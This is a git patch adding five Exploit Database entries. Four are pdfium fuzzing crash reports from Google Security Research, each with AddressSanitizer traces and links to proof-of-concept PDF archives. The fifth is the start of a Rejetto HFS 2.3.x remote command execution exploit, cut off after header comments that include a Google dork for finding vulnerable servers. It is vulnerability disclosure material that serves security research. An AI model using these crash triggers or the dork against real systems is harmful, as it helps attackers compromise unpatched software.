From 19f864b3ca9282782d1bb584a22793e09b814180 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 5 Jan 2016 05:03:47 +0000 Subject: [PATCH] DB: 2016-01-05 5 new exploits --- files.csv | 5 ++ platforms/multiple/dos/39162.txt | 96 +++++++++++++++++++++++++++++++ platforms/multiple/dos/39163.txt | 84 +++++++++++++++++++++++++++ platforms/multiple/dos/39164.txt | 59 +++++++++++++++++++ platforms/multiple/dos/39165.txt | 84 +++++++++++++++++++++++++++ platforms/windows/remote/39161.py | 47 +++++++++++++++ 6 files changed, 375 insertions(+) create mode 100755 platforms/multiple/dos/39162.txt create mode 100755 platforms/multiple/dos/39163.txt create mode 100755 platforms/multiple/dos/39164.txt create mode 100755 platforms/multiple/dos/39165.txt create mode 100755 platforms/windows/remote/39161.py diff --git a/files.csv b/files.csv index 2f33cc2fc..13b8f2808 100755 --- a/files.csv +++ b/files.csv @@ -35406,3 +35406,8 @@ id,file,description,date,author,platform,type,port 39155,platforms/linux/remote/39155.txt,"lxml 'clean_html' Function Security Bypass Vulnerability",2014-04-15,"Maksim Kochkin",linux,remote,0 39156,platforms/cgi/webapps/39156.txt,"ZamFoo Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0 39157,platforms/php/webapps/39157.txt,"Puntopy 'novedad.php' SQL Injection Vulnerability",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0 +39161,platforms/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution",2016-01-04,"Avinash Thapa",windows,remote,0 +39162,platforms/multiple/dos/39162.txt,"pdfium CPDF_DIBSource::DownSampleScanline32Bit - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0 +39163,platforms/multiple/dos/39163.txt,"pdfium CPDF_TextObject::CalcPositionData - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0 +39164,platforms/multiple/dos/39164.txt,"pdfium IsFlagSet (v8 memory management) - SIGSEGV",2016-01-04,"Google Security Research",multiple,dos,0 +39165,platforms/multiple/dos/39165.txt,"pdfium CPDF_Function::Call - Stack-Based Buffer Overflow",2016-01-04,"Google Security Research",multiple,dos,0 diff --git a/platforms/multiple/dos/39162.txt b/platforms/multiple/dos/39162.txt new file mode 100755 index 000000000..08bce4088 --- /dev/null +++ b/platforms/multiple/dos/39162.txt @@ -0,0 +1,96 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=625 + +The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing: + +--- cut --- +$ ./pdfium_test asan_heap-oob_d08cef_3699_8361562cacee739a7c6cb31eea735eb6 +Rendering PDF file asan_heap-oob_d08cef_3699_8361562cacee739a7c6cb31eea735eb6. +Non-linearized path... +================================================================= +==28672==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61800000f7b2 at pc 0x000000ed2cac bp 0x7ffea0af5970 sp 0x7ffea0af5968 +READ of size 1 at 0x61800000f7b2 thread T0 + #0 0xed2cab in CPDF_DIBSource::DownSampleScanline32Bit(int, int, unsigned int, unsigned char const*, unsigned char*, int, int, int, int) const core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1479:64 + #1 0xece99e in CPDF_DIBSource::DownSampleScanline(int, unsigned char*, int, int, int, int, int) const core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1277:5 + #2 0x115235c in CFX_ImageStretcher::ContinueQuickStretch(IFX_Pause*) core/src/fxge/dib/fx_dib_engine.cpp:910:5 + #3 0x1151805 in CFX_ImageStretcher::Continue(IFX_Pause*) core/src/fxge/dib/fx_dib_engine.cpp:834:12 + #4 0x11831f8 in CFX_ImageTransformer::Continue(IFX_Pause*) core/src/fxge/dib/fx_dib_transform.cpp:409:7 + #5 0x117a4a1 in CFX_ImageRenderer::Continue(IFX_Pause*) core/src/fxge/dib/fx_dib_main.cpp:1637:9 + #6 0x10986a2 in CFX_AggDeviceDriver::ContinueDIBits(void*, IFX_Pause*) core/src/fxge/agg/src/fx_agg_driver.cpp:1748:10 + #7 0x11a32f1 in CFX_RenderDevice::ContinueDIBits(void*, IFX_Pause*) core/src/fxge/ge/fx_ge_device.cpp:471:10 + #8 0xe8f1f1 in CPDF_ImageRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:869:12 + #9 0xe673bf in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:299:9 + #10 0xe67eff in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:328:12 + #11 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13 + #12 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3 + #13 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3 + #14 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3 + #15 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3 + #16 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9 + #17 0x4f16e9 in main samples/pdfium_test.cc:608:5 + +0x61800000f7b2 is located 0 bytes to the right of 818-byte region [0x61800000f480,0x61800000f7b2) +allocated by thread T0 here: + #0 0x4be96c in calloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:56 + #1 0x67da0f in FX_AllocOrDie(unsigned long, unsigned long) fpdfsdk/src/../include/../../core/include/fpdfapi/../fxcrt/fx_memory.h:37:22 + #2 0xe1c1d6 in CPDF_SyntaxParser::ReadStream(CPDF_Dictionary*, PARSE_CONTEXT*, unsigned int, unsigned int) core/src/fpdfapi/fpdf_parser/fpdf_parser_parser.cpp:2444:13 + #3 0xe06543 in CPDF_SyntaxParser::GetObject(CPDF_IndirectObjects*, unsigned int, unsigned int, PARSE_CONTEXT*, int) core/src/fpdfapi/fpdf_parser/fpdf_parser_parser.cpp:2171:12 + #4 0xe071a4 in CPDF_Parser::ParseIndirectObjectAt(CPDF_IndirectObjects*, long, unsigned int, PARSE_CONTEXT*) core/src/fpdfapi/fpdf_parser/fpdf_parser_parser.cpp:1400:7 + #5 0xe0897f in CPDF_Parser::ParseIndirectObject(CPDF_IndirectObjects*, unsigned int, PARSE_CONTEXT*) core/src/fpdfapi/fpdf_parser/fpdf_parser_parser.cpp:1195:12 + #6 0xdd7c93 in CPDF_IndirectObjects::GetIndirectObject(unsigned int, PARSE_CONTEXT*) core/src/fpdfapi/fpdf_parser/fpdf_parser_objects.cpp:1125:12 + #7 0xddafdf in CPDF_Object::GetDirect() const core/src/fpdfapi/fpdf_parser/fpdf_parser_objects.cpp:220:10 + #8 0xde4960 in CPDF_Dictionary::GetElementValue(CFX_ByteStringC const&) const core/src/fpdfapi/fpdf_parser/fpdf_parser_objects.cpp:594:14 + #9 0xd99b9b in CPDF_StreamContentParser::FindResourceObj(CFX_ByteStringC const&, CFX_ByteString const&) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:1178:25 + #10 0xd8d60c in CPDF_StreamContentParser::Handle_ExecuteXObject() core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:696:36 + #11 0xd979e1 in CPDF_StreamContentParser::OnOperator(char const*) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:369:7 + #12 0xda3491 in CPDF_StreamContentParser::Parse(unsigned char const*, unsigned int, unsigned int) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:56:9 + #13 0xdb7d0f in CPDF_ContentParser::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:1096:13 + #14 0xd01db4 in CPDF_PageObjects::ContinueParse(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:693:3 + #15 0xd0568d in CPDF_Page::ParseContent(CPDF_ParseOptions*, int) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:874:3 + #16 0x63bbe7 in FPDF_LoadPage fpdfsdk/src/fpdfview.cpp:291:3 + #17 0x4edcd1 in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:352:20 + #18 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9 + #19 0x4f16e9 in main samples/pdfium_test.cc:608:5 + +SUMMARY: AddressSanitizer: heap-buffer-overflow core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1479:64 in CPDF_DIBSource::DownSampleScanline32Bit(int, int, unsigned int, unsigned char const*, unsigned char*, int, int, int, int) const +Shadow bytes around the buggy address: + 0x0c307fff9ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c307fff9eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c307fff9ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c307fff9ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c307fff9ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0c307fff9ef0: 00 00 00 00 00 00[02]fa fa fa fa fa fa fa fa fa + 0x0c307fff9f00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c307fff9f10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd + 0x0c307fff9f20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd + 0x0c307fff9f30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd + 0x0c307fff9f40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==28672==ABORTING +--- cut --- + +The crash was reported at https://code.google.com/p/chromium/issues/detail?id=554151. Attached are two PDF files which trigger the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39162.zip + diff --git a/platforms/multiple/dos/39163.txt b/platforms/multiple/dos/39163.txt new file mode 100755 index 000000000..073a95473 --- /dev/null +++ b/platforms/multiple/dos/39163.txt @@ -0,0 +1,84 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=623 + +The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing: + +--- cut --- +$ ./pdfium_test asan_heap-oob_b4a7e0_7134_a91748c99d169425fc39c76197d7cd74 +Rendering PDF file asan_heap-oob_b4a7e0_7134_a91748c99d169425fc39c76197d7cd74. +Non-linearized path... +================================================================= +==27153==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60700000794c at pc 0x000000cfaaef bp 0x7ffd89a11070 sp 0x7ffd89a11068 +READ of size 4 at 0x60700000794c thread T0 + #0 0xcfaaee in CPDF_TextObject::CalcPositionData(float*, float*, float, int) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:411:17 + #1 0xda18a4 in CPDF_StreamContentParser::AddTextObject(CFX_ByteString*, float, float*, int) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:1301:3 + #2 0xd919e7 in CPDF_StreamContentParser::Handle_ShowText() core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:1330:3 + #3 0xd979e1 in CPDF_StreamContentParser::OnOperator(char const*) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:369:7 + #4 0xda3491 in CPDF_StreamContentParser::Parse(unsigned char const*, unsigned int, unsigned int) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:56:9 + #5 0xdb7d0f in CPDF_ContentParser::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:1096:13 + #6 0xd01db4 in CPDF_PageObjects::ContinueParse(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:693:3 + #7 0xd0568d in CPDF_Page::ParseContent(CPDF_ParseOptions*, int) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:874:3 + #8 0x63bbe7 in FPDF_LoadPage fpdfsdk/src/fpdfview.cpp:291:3 + #9 0x4edcd1 in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:352:20 + #10 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9 + #11 0x4f16e9 in main samples/pdfium_test.cc:608:5 + +0x60700000794c is located 4 bytes to the left of 72-byte region [0x607000007950,0x607000007998) +allocated by thread T0 here: + #0 0x4be96c in calloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:56 + #1 0x67da0f in FX_AllocOrDie(unsigned long, unsigned long) fpdfsdk/src/../include/../../core/include/fpdfapi/../fxcrt/fx_memory.h:37:22 + #2 0xcf6db6 in CPDF_TextObject::SetSegments(CFX_ByteString const*, float*, int) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:233:18 + #3 0xda150f in CPDF_StreamContentParser::AddTextObject(CFX_ByteString*, float, float*, int) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:1296:3 + #4 0xd919e7 in CPDF_StreamContentParser::Handle_ShowText() core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:1330:3 + #5 0xd979e1 in CPDF_StreamContentParser::OnOperator(char const*) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:369:7 + #6 0xda3491 in CPDF_StreamContentParser::Parse(unsigned char const*, unsigned int, unsigned int) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:56:9 + #7 0xdb7d0f in CPDF_ContentParser::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:1096:13 + #8 0xd01db4 in CPDF_PageObjects::ContinueParse(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:693:3 + #9 0xd0568d in CPDF_Page::ParseContent(CPDF_ParseOptions*, int) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:874:3 + #10 0x63bbe7 in FPDF_LoadPage fpdfsdk/src/fpdfview.cpp:291:3 + #11 0x4edcd1 in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:352:20 + #12 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9 + #13 0x4f16e9 in main samples/pdfium_test.cc:608:5 + +SUMMARY: AddressSanitizer: heap-buffer-overflow core/src/fpdfapi/fpdf_page/fpdf_page.cpp:411:17 in CPDF_TextObject::CalcPositionData(float*, float*, float, int) +Shadow bytes around the buggy address: + 0x0c0e7fff8ed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c0e7fff8ee0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c0e7fff8ef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c0e7fff8f00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c0e7fff8f10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +=>0x0c0e7fff8f20: fa fa fa fa fa fa fa fa fa[fa]00 00 00 00 00 00 + 0x0c0e7fff8f30: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x0c0e7fff8f40: 00 04 fa fa fa fa 00 00 00 00 00 00 00 00 00 fa + 0x0c0e7fff8f50: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 fa fa + 0x0c0e7fff8f60: fa fa 00 00 00 00 00 00 00 00 00 00 fa fa fa fa + 0x0c0e7fff8f70: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fd fd +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==27153==ABORTING +--- cut --- + +The crash was reported at https://code.google.com/p/chromium/issues/detail?id=554115. Attached is the PDF file which triggers the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39163.zip + diff --git a/platforms/multiple/dos/39164.txt b/platforms/multiple/dos/39164.txt new file mode 100755 index 000000000..06c58f596 --- /dev/null +++ b/platforms/multiple/dos/39164.txt @@ -0,0 +1,59 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=622 + +The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing: + +--- cut --- +==31710==ERROR: AddressSanitizer: SEGV on unknown address 0x7f53cc100009 (pc 0x0000016fafe2 bp 0x7ffee170d730 sp 0x7ffee170d6b0 T0) + #0 0x16fafe1 in IsFlagSet v8/src/heap/spaces.h:548:13 + #1 0x16fafe1 in IsEvacuationCandidate v8/src/heap/spaces.h:689 + #2 0x16fafe1 in RecordSlot v8/src/heap/mark-compact-inl.h:62 + #3 0x16fafe1 in VisitPointers v8/src/heap/incremental-marking.cc:320 + #4 0x16fafe1 in v8::internal::StaticMarkingVisitor::VisitPropertyCell(v8::internal::Map*, v8::internal::HeapObject*) v8/src/heap/objects-visiting-inl.h:341 + #5 0x16ed00a in IterateBody v8/src/heap/objects-visiting.h:355:5 + #6 0x16ed00a in VisitObject v8/src/heap/incremental-marking.cc:732 + #7 0x16ed00a in ProcessMarkingDeque v8/src/heap/incremental-marking.cc:769 + #8 0x16ed00a in v8::internal::IncrementalMarking::Step(long, v8::internal::IncrementalMarking::CompletionAction, v8::internal::IncrementalMarking::ForceMarkingAction, v8::internal::IncrementalMarking::ForceCompletionAction) v8/src/heap/incremental-marking.cc:1098 + #9 0x1836243 in InlineAllocationStep v8/src/heap/spaces.h:2537:7 + #10 0x1836243 in InlineAllocationStep v8/src/heap/spaces.cc:1636 + #11 0x1836243 in v8::internal::NewSpace::EnsureAllocation(int, v8::internal::AllocationAlignment) v8/src/heap/spaces.cc:1597 + #12 0x16028a2 in AllocateRawUnaligned v8/src/heap/spaces-inl.h:456:10 + #13 0x16028a2 in AllocateRaw v8/src/heap/spaces-inl.h:480 + #14 0x16028a2 in v8::internal::Heap::AllocateRaw(int, v8::internal::AllocationSpace, v8::internal::AllocationAlignment) v8/src/heap/heap-inl.h:215 + #15 0x16960d7 in v8::internal::Heap::AllocateFillerObject(int, bool, v8::internal::AllocationSpace) v8/src/heap/heap.cc:2119:35 + #16 0x159a4a2 in v8::internal::Factory::NewFillerObject(int, bool, v8::internal::AllocationSpace) v8/src/factory.cc:79:3 + #17 0x25834ee in __RT_impl_Runtime_AllocateInTargetSpace v8/src/runtime/runtime-internal.cc:246:11 + #18 0x25834ee in v8::internal::Runtime_AllocateInTargetSpace(int, v8::internal::Object**, v8::internal::Isolate*) v8/src/runtime/runtime-internal.cc:236 + #7 0x7f53d03063d7 () + #8 0x7f53d040f273 () + #9 0x7f53d040ad4d () + #10 0x7f53d0336da3 () + #11 0x7f53d031a8e1 () + #19 0x158a09f in v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, bool, v8::internal::Handle, v8::internal::Handle, int, v8::internal::Handle*, v8::internal::Handle) v8/src/execution.cc:98:13 + #20 0x158882d in v8::internal::Execution::Call(v8::internal::Isolate*, v8::internal::Handle, v8::internal::Handle, int, v8::internal::Handle*) v8/src/execution.cc:167:10 + #21 0xf6e33e in v8::Script::Run(v8::Local) v8/src/api.cc:1743:23 + #22 0xebf5cb in FXJS_Execute(v8::Isolate*, IJS_Context*, wchar_t const*, FXJSErr*) third_party/pdfium/fpdfsdk/src/jsapi/fxjs_v8.cpp:384:8 + #23 0xe3cc12 in CJS_Runtime::Execute(IJS_Context*, wchar_t const*, CFX_WideString*) third_party/pdfium/fpdfsdk/src/javascript/JS_Runtime.cpp:188:14 + #24 0xf54991 in CJS_Context::RunScript(CFX_WideString const&, CFX_WideString*) third_party/pdfium/fpdfsdk/src/javascript/JS_Context.cpp:59:12 + #25 0x553134 in CPDFSDK_InterForm::OnFormat(CPDF_FormField*, int&) third_party/pdfium/fpdfsdk/src/fsdk_baseform.cpp:1822:24 + #26 0x552b8c in CPDFSDK_Widget::OnFormat(int&) third_party/pdfium/fpdfsdk/src/fsdk_baseform.cpp:330:10 + #27 0x584be9 in CPDFSDK_BFAnnotHandler::OnLoad(CPDFSDK_Annot*) third_party/pdfium/fpdfsdk/src/fsdk_annothandler.cpp:593:31 + #28 0x57e44a in CPDFSDK_AnnotHandlerMgr::Annot_OnLoad(CPDFSDK_Annot*) third_party/pdfium/fpdfsdk/src/fsdk_annothandler.cpp:94:5 + #29 0x574f67 in CPDFSDK_PageView::LoadFXAnnots() third_party/pdfium/fpdfsdk/src/fsdk_mgr.cpp:886:5 + #30 0x573c36 in CPDFSDK_Document::GetPageView(CPDF_Page*, int) third_party/pdfium/fpdfsdk/src/fsdk_mgr.cpp:420:3 + #31 0x528ec3 in FormHandleToPageView third_party/pdfium/fpdfsdk/src/fpdfformfill.cpp:32:20 + #32 0x528ec3 in FORM_OnAfterLoadPage third_party/pdfium/fpdfsdk/src/fpdfformfill.cpp:263 + #33 0x4da9c2 in RenderPage(std::__1::basic_string, std::__1::allocator > const&, void* const&, void* const&, int, Options const&) third_party/pdfium/samples/pdfium_test.cc:346:3 + #34 0x4dd558 in RenderPdf(std::__1::basic_string, std::__1::allocator > const&, char const*, unsigned long, Options const&) third_party/pdfium/samples/pdfium_test.cc:520:9 + #35 0x4de3d1 in main third_party/pdfium/samples/pdfium_test.cc:597:5 + #36 0x7f553e1c4ec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287 +AddressSanitizer can not provide additional info. +SUMMARY: AddressSanitizer: SEGV (pdfium_test+0x16fafe1) +==31710==ABORTING +--- cut --- + +The crash was reported at https://code.google.com/p/chromium/issues/detail?id=554099. Attached is the PDF file which triggers the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39164.zip + diff --git a/platforms/multiple/dos/39165.txt b/platforms/multiple/dos/39165.txt new file mode 100755 index 000000000..f0d1035c5 --- /dev/null +++ b/platforms/multiple/dos/39165.txt @@ -0,0 +1,84 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=612 + +The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing: + +--- cut --- +$ ./pdfium_test asan_stack-oob_b9a750_1372_52559cc9c86b4bc0fb43218c7f69c5c8 +Rendering PDF file asan_stack-oob_b9a750_1372_52559cc9c86b4bc0fb43218c7f69c5c8. +Non-linearized path... +================================================================= +==22207==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc8b7edb84 at pc 0x000000d6f064 bp 0x7ffc8b7ed8c0 sp 0x7ffc8b7ed8b8 +READ of size 4 at 0x7ffc8b7edb84 thread T0 + #0 0xd6f063 in CPDF_Function::Call(float*, int, float*, int&) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:896:9 + #1 0xd6ecd2 in CPDF_StitchFunc::v_Call(float*, float*) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:808:3 + #2 0xd6f6a7 in CPDF_Function::Call(float*, int, float*, int&) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:902:3 + #3 0xedbc22 in DrawFuncShading(CFX_DIBitmap*, CFX_Matrix*, CPDF_Dictionary*, CPDF_Function**, int, CPDF_ColorSpace*, int) core/src/fpdfapi/fpdf_render/fpdf_render_pattern.cpp:293:15 + #4 0xeda3c0 in CPDF_RenderStatus::DrawShading(CPDF_ShadingPattern*, CFX_Matrix*, FX_RECT&, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_pattern.cpp:875:7 + #5 0xee45b9 in CPDF_RenderStatus::ProcessShading(CPDF_ShadingObject*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render_pattern.cpp:954:3 + #6 0xe6700d in CPDF_RenderStatus::ProcessObjectNoClip(CPDF_PageObject const*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:399:14 + #7 0xe61f6d in CPDF_RenderStatus::RenderSingleObject(CPDF_PageObject const*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:292:3 + #8 0xe618c1 in CPDF_RenderStatus::RenderObjectList(CPDF_PageObjects const*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:269:5 + #9 0xe6bc26 in CPDF_RenderStatus::ProcessForm(CPDF_FormObject*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:485:3 + #10 0xe6704c in CPDF_RenderStatus::ProcessObjectNoClip(CPDF_PageObject const*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:402:14 + #11 0xe67f47 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:330:3 + #12 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13 + #13 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3 + #14 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3 + #15 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3 + #16 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3 + #17 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9 + #18 0x4f16e9 in main samples/pdfium_test.cc:608:5 + +Address 0x7ffc8b7edb84 is located in stack of thread T0 at offset 36 in frame + #0 0xd6e2af in CPDF_StitchFunc::v_Call(float*, float*) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:795 + + This frame has 2 object(s): + [32, 36) 'input' <== Memory access at offset 36 overflows this variable + [48, 52) 'nresults' +HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext + (longjmp and C++ exceptions *are* supported) +SUMMARY: AddressSanitizer: stack-buffer-overflow core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:896:9 in CPDF_Function::Call(float*, int, float*, int&) const +Shadow bytes around the buggy address: + 0x1000116f5b20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1000116f5b30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1000116f5b40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1000116f5b50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1000116f5b60: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 +=>0x1000116f5b70:[04]f2 04 f3 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1000116f5b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1000116f5b90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1000116f5ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1000116f5bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1000116f5bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==22207==ABORTING +--- cut --- + +While the sample crashes on a memory read operation in AddressSanitizer, an out-of-bounds "write" takes place subsequently in the same method, leading to a stack-based buffer overflow condition. + +The crash was reported at https://code.google.com/p/chromium/issues/detail?id=551460. Attached is the PDF file which triggers the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39165.zip + diff --git a/platforms/windows/remote/39161.py b/platforms/windows/remote/39161.py new file mode 100755 index 000000000..41b5a545b --- /dev/null +++ b/platforms/windows/remote/39161.py @@ -0,0 +1,47 @@ +#!/usr/bin/python +# Exploit Title: HttpFileServer 2.3.x Remote Command Execution +# Google Dork: intext:"httpfileserver 2.3" +# Date: 04-01-2016 +# Remote: Yes +# Exploit Author: Avinash Kumar Thapa aka "-Acid" +# 